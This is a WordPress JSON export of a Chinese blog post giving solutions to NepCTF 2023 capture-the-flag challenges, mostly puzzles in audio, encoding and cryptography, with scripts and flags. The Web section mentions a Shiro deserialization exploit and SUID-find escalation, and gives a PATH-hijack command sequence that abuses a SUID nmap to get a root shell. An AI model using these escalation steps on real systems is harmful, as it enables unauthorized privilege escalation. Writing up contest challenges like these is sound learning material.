{"id":262,"date":"2023-08-14T12:51:55","date_gmt":"2023-08-14T04:51:55","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=262"},"modified":"2023-08-14T12:51:55","modified_gmt":"2023-08-14T04:51:55","slug":"nepctf-2023-wp","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/262","title":{"rendered":"NepCTF 2023 WP"},"content":{"rendered":"

Misc<\/h1>\n

codes<\/h2>\n

\u6284https:\/\/blog.csdn.net\/aspnet_lyc\/article\/details\/20548767<\/p>\n

#include <stdio.h>\n\nint main(int argc, char** argv, char** arge)\n{\n    while(*arge)\n    {\n        printf("%s\\n", *arge++);\n    }\n    return 0;\n}<\/code><\/pre>\n
\"\"<\/p>\n
\u4e0eAI\u5171\u821e\u7684\u54c8\u592b\u66fc<\/h2>\n
copilot\u79d2\u4e86<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
ConnectedFive<\/h2>\n
\u4e07\u5b81\u4e94\u5b50\u68cb\uff0c\u624b\u52a8\u4e0b\u4e86\u4e00\u4f1a\u611f\u89c9\u624b\u52a8\u4e5f\u884c\uff0c\u4f46\u662f\u8fd8\u662f\u5199\u4e2a\u811a\u672c\uff0c\u7531\u4e8e\u6ca1\u6709\u4ec0\u4e48\u89c4\u5f8b\uff0c\u76f4\u63a5random\u4e0b\u68cb\u4e86\uff0c\u4e50<\/p>\n
from pwn import *\nimport random\n\nr = remote('nepctf.1cepeak.cn', 31762)\n\ndef getboard():\n    board = []\n    for i in range(15):\n        data = r.recvline().decode()[3:].replace('[', ' ').replace(']', ' ').strip()\n        data = data.split(' ')\n        board.append(data)\n    return board\n\ntable = 'abcdefghijklmno'\nwhile True:\n    r.recvline()\n    r.recvline()\n    r.recvline()\n    r.recvline()\n    res = r.recvline().decode()\n    if(int(res.split(':')[0]) >= 38):\n        r.interactive()\n    print(res)\n    r.recvline()\n    r.recvline()\n    board = getboard()\n    random_x = random.randint(0, 14)\n    random_y = random.randint(0, 14)\n    while board[random_y][random_x] != '.':\n        random_x = random.randint(0, 14)\n        random_y = random.randint(0, 14)\n    pos = table[random_x] + table[random_y]\n    r.recvline()\n    r.sendline(pos)\n    r.recvline()<\/code><\/pre>\n
\u8dd1\u4e86\u5f88\u591a\u6b21\u53d1\u73b0\u6253\u8d62\u6982\u7387\u633a\u9ad8\uff0c\u5c31\u662f\u8dd1\u7684\u8fc7\u7a0b\u4e2d\u5bb9\u6613\u5f00\u5934\u5c31\u5361\u6b7b\uff0c\u61d2\u5f97\u4f18\u5316\u4e86\uff0c\u5f00\u5934\u4e0d\u5361\u6b7b\u540e\u9762\u57fa\u672c\u6ca1\u95ee\u9898<\/p>\n
\"\"<\/p>\n
\u964c\u751f\u7684\u8bed\u8a00<\/h2>\n
\u76f4\u63a5\u7167\u7740\u6284<\/p>\n
https:\/\/ay.medyotan.ga\/upload\/lwa_moonrunes.png<\/a><\/p>\n
https:\/\/fonts2u.com\/dinotopian.font<\/a><\/p>\n
NepCTF{NEPNEP_A_BELIEVING_HEART_IS_YOUR_MAGIC}<\/code><\/pre>\n
\u5c0f\u53ee\u5f39\u94a2\u7434<\/h2>\n
audacity\u6253\u5f00\u7136\u540e\u7f29\u5c0f\u6a2a\u7740\u770b<\/p>\n
\u524d\u9762\u662f\u83ab\u65af\u540e\u9762\u662f16\u8fdb\u5236<\/p>\n
\u524d\uff1ayoushouldusethistoxorsomething\n\u540e\uff1a0x370a05303c290e045005031c2b1858473a5f052117032c39230f005d1e17<\/code><\/pre>\n
\u76f4\u63a5xor<\/p>\n
\"\"<\/p>\n
\u4f60\u4e5f\u559c\u6b22\u4e09\u6708\u4e03\u4e48<\/h2>\n
\u9898\u76ee\u63cf\u8ff0\u6bd4\u8f83\u91cd\u8981<\/p>\n
\u4e09\u6708\u4e03\uff1a\u8036\uff0c\u7ec8\u4e8e\u6765\u5230Nepnep\u661f\u7403\u5566\uff0c\u8ba9\u6211\u770b\u770b\u6b63\u5728\u706b\u70ed\u8fdb\u884c\u7684Hacker\u593a\u65d7\u5927\u8d5b\u7fa4\u804a\u3002\u554a\uff01\u5f00\u62d3\u8005\uff0c\u8fd9\u7fa4\u540d\u770b\u8d77\u6765\u602a\u602a\u7684\u8bf6\u3002 \uff08\u4f38\u51fa\u8111\u888b\uff0c\u51d1\u8fd1\u7fa4\u540d\uff0c\u8f7b\u8f7b\u7684\u95fb\u4e86\u4e00\u4e0b\uff09\u54c7\uff0c\u597d\u54b8\u8bf6\uff0c\u5f00\u62d3\u8005\u4f60\u5feb\u6765\u770b\u770b\uff01\n\n\u5f00\u62d3\u8005\uff08U_id\uff09\uff1a(\u7aef\u7740\u4e0b\u5df4\uff0c\u78e8\u8e6d\u4e86\u4e00\u4e0b\uff0c\u773c\u795e\u82e5\u6709\u6240\u601d\uff09\u8fd9\u597d\u50cf\u9700\u8981\u7ecf\u8fc7\u5565256\u5904\u7406\u4e00\u4e0b\u624d\u80fd\u5f97\u5230\u6211\u4eec\u9700\u8981\u7684\u5173\u952e\u3002<\/code><\/pre>\n
\u5f97\u5230\u4e24\u4e2a\u6d88\u606f\uff0c\u4e00\u662f\u7fa4\u540d\u662fsalt\uff0c\u4e8c\u662f\u7fa4\u540dsha256\u4e4b\u540e\u5c31\u662fkey<\/p>\n
\u5c31\u53ef\u4ee5\u8fd8\u539f\u6240\u6709\u53c2\u6570(key\u53d6sha256\u4e4b\u540e\u524d16\u4f4d<\/p>\n
salt = NepCTF2023\nkey = dd8e671df3882c5be6423cd030bd7cb6\niv= 88219bdee9c396eca3c637c0ea436058\nciphertext= b700ae6d0cc979a4401f3dd440bf9703b292b57b6a16b79ade01af58025707fbc29941105d7f50f2657cf7eac735a800ecccdfd42bf6c6ce3b00c8734bf500c819e99e074f481dbece626ccc2f6e0562a81fe84e5dd9750f5a0bb7c20460577547d3255ba636402d6db8777e0c5a429d07a821bf7f9e0186e591dfcfb3bfedfc<\/code><\/pre>\n
\u76f4\u63a5\u89e3\u5bc6<\/p>\n
\"\"<\/p>\n
\u56fe\u7247\u91cc\u9762\u5c31\u662f\u661f\u94c1\u7684\u6587\u5b57\uff0c\u76f4\u63a5\u7167\u7740\u6284\u5c31\u884c\u4e86<\/p>\n
\"\"<\/p>\n
NepCTF{HRP_always_likes_March_7th}<\/code><\/pre>\n
lic<\/h2>\n
\u62d6\u8fdbaudacity\u653e\u5927\u7b80\u5355\u89c2\u5bdf\u4e00\u624b\uff0c\u53d1\u73b0\u5927\u6982\u6709\u8fd9\u4e09\u79cd\u5e8f\u5217\u5206\u522b\u662f\u957f\u5ea6\u4e3a57\u7684\u3001\u957f\u5ea6\u4e3a22\u7684\u548c\u957f\u5ea6\u4e3a44\u7684<\/p>\n
\u5176\u4e2d57\u7684\u53ea\u5728\u5f00\u5934\u51fa\u73b0\u53e6\u5916\u4e24\u79cd\u968f\u673a\u51fa\u73b0<\/p>\n
\u5c0f\u6e9c\u4e00\u624bgpt<\/p>\n
import wave\nimport numpy as np\n\ndef demodulate_pcm(filename):\n    # \u6253\u5f00WAV\u6587\u4ef6\n    with wave.open(filename, 'rb') as wav_file:\n        # \u83b7\u53d6\u97f3\u9891\u53c2\u6570\n        channels = wav_file.getnchannels()\n        sample_width = wav_file.getsampwidth()\n        sample_rate = wav_file.getframerate()\n        num_frames = wav_file.getnframes()\n        # \u8bfb\u53d6\u97f3\u9891\u6570\u636e\n        audio_data = wav_file.readframes(num_frames)\n        # \u5c06\u4e8c\u8fdb\u5236\u6570\u636e\u8f6c\u6362\u4e3anumpy\u6570\u7ec4\n        audio_np = np.frombuffer(audio_data, dtype=np.int16)\n        # \u89e3\u8c03PCM\u6570\u636e\n        demodulated_data = audio_np.flatten()\n        # \u7f29\u653e\u89e3\u8c03\u6570\u636e\n        demodulated_data = demodulated_data \/ (2 ** (sample_width * 8 - 1))\n\n    return demodulated_data, sample_rate\n\nfilename = 'lic.wav'  # \u66ff\u6362\u4e3a\u60a8\u7684WAV\u6587\u4ef6\u8def\u5f84\ndemodulated_data, sample_rate = demodulate_pcm(filename)\n\nfor i in demodulated_data:\n    print(round(i),end='')<\/code><\/pre>\n
\u7b80\u5355\u624b\u52a8\u5904\u7406\u4e00\u4e0b\uff0c\u628a-1\u63622<\/p>\n
\u7136\u540e\u628a\u5f88\u591a\u4e2a0\u6362\u62101\u4e2a0\uff0c\u5e76\u4e14\u4ee5\u8fd9\u4e2a0\u4e3a\u754c\u9650\u5206\u51fa\u524d\u540e\u4e24\u90e8\u5206<\/p>\n
\u7136\u540e\u5bf9\u524d\u4e00\u90e8\u5206\u8fdb\u884c\u624b\u52a8\u66ff\u6362<\/p>\n
222222222222222222222222222211111111111111111111111111111 --> 6\n22222222222222222222221111111111111111111111  --> 0\n222222222211111111111 --> 3\n3 --> 1\n\u7136\u540e\u624b\u52a8\u628a\u591a\u4f59\u76842\u53bb\u4e86<\/code><\/pre>\n
\u7136\u540e16\u4e2a\u4e00\u7ec4\u753b\u56fe\uff0c\u8fd9\u65f6\u5019\u753b\u51fa\u6765\u7684\u56fe\u6709\u4e00\u5b9a\u7684\u504f\u79fb\uff0c\u5f00\u5934\u518d\u6dfb\u52a05\u4e2a6\u753b\u7684\u5c31\u5f88\u597d\u4e86<\/p>\n
f = open('3.txt').read()\nfor i in range(0, len(f), 16):\n    print(f[i:i+16][::-1])<\/code><\/pre>\n
\u5927\u6982\u8fd9\u6837<\/p>\n
\"\"<\/p>\n
Ez_BASIC_II<\/h2>\n
\u5728\u7ebf\u5de5\u5177\u76f4\u63a5\u8f6c\u6362<\/p>\n
https:\/\/www.my-trs-80.com\/cassette\/<\/a><\/p>\n
\u62ff\u5230BASIC\u7a0b\u5e8f<\/p>\n
\"\"<\/p>\n
\u624b\u52a8\u63d0\u53d6\u51fa\u6240\u6709\u6570\u5b57<\/p>\n
\u7136\u540e\u653e\u8fdbcyberchef<\/p>\n
\u8fd9\u65f6\u5019\u5c31\u6bd4\u8f83\u660e\u663e\u4e86<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u4ece\u91cc\u9762\u590d\u5236\u51fa\u6765\u518d\u63d0\u7eaf<\/p>\n
res = '''\n.........\n...\u00a0\u00b0\u00b0...\n..\u00ba...\u00bd..\n..\u00bf......\n..\u00ab\u00b4\u00b0\u00b0...\n.........\n.........\n..\u00a0.\u00b0\u00b0...\n..\u00aa...\u00bd..\n..\u00aa...\u00bf..\n..\u00aa\u00b5\u00b0\u00b8...\n..\u00aa......\n....\u00b0\u00b0...\n..\u00a8......\n..\u00bf......\n..\u00bf......\n...\u00bd\u00b0\u00b0\u00b8..\n.........\n..\u00b0\u00b0\u00b0\u00b0\u00b0..\n....\u00bf....\n....\u00bf....\n....\u00bf....\n.........\n'''\n\nres = res.split('\\n')\nfor i in res:\n    for j in range(len(i)):\n        if(i[j] != '.'):\n            print('A',end='')\n            continue\n        print(' ',end='')\n    print()<\/code><\/pre>\n
\u5c31\u7a0d\u5fae\u6e05\u695a\u4e00\u70b9\u4e86<\/p>\n
\"\"<\/p>\n
CheckIn<\/h2>\n
\u76f4\u63a5\u4ea4<\/p>\n
\u95ee\u5377<\/h2>\n
\u76f4\u63a5\u586b<\/p>\n
Web<\/h1>\n
ez_java_checkin<\/h2>\n
\u6293\u5305\u53d1\u73b0rememberme=deleteme\uff0c\u641c\u5230\u662fshiro\u7684\u53cd\u5e8f\u5217\u5316<\/p>\n
\u5de5\u5177\u76f4\u63a5\u6253<\/p>\n
\"\"<\/p>\n
\u62ff\u5230shell\u53d1\u73b0find\u6709suid\u6743\u9650\uff0c\u76f4\u63a5\u63d0<\/p>\n
\"\"<\/p>\n
\u72ec\u6b65\u5929\u4e0b-\u8f6c\u751f\u6210\u4e3a\u955c\u82b1\u6c34\u6708\u4e2d\u7684\u738b\u8005<\/h2>\n
\u63d0\u793a\u8bf4\u662f\u73af\u5883\u53d8\u91cf\u63d0\u6743\uff0c\u540c\u65f6\u53ef\u4ee5\u641c\u5230nmap\u6709suid\u6743\u9650\u5e76\u4e14\u4f3c\u4e4e\u4f1a\u8c03\u7528ports-alive\u8fd9\u4e2a\u4e1c\u897f<\/p>\n
\u76f4\u63a5\u4e00\u5957\u5c0f\u8fde\u62db\u63d0\u6743<\/p>\n
echo "\/bin\/busybox sh" > \/tmp\/ports-alive\nchmod 777 \/tmp\/ports-alive\nexport PATH=\/tmp\n\/bin\/nmap 123<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Misc codes \u6284https:\/\/blog.csdn.net\/aspnet_lyc\/article\/details\/20548767 #include <stdio.h> int main(int argc, char** argv, char** arge) { while(*arge) { printf("%s\\n", *arge++); } return […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-262","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/262","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=262"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/262\/revisions"}],"predecessor-version":[{"id":263,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/262\/revisions\/263"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}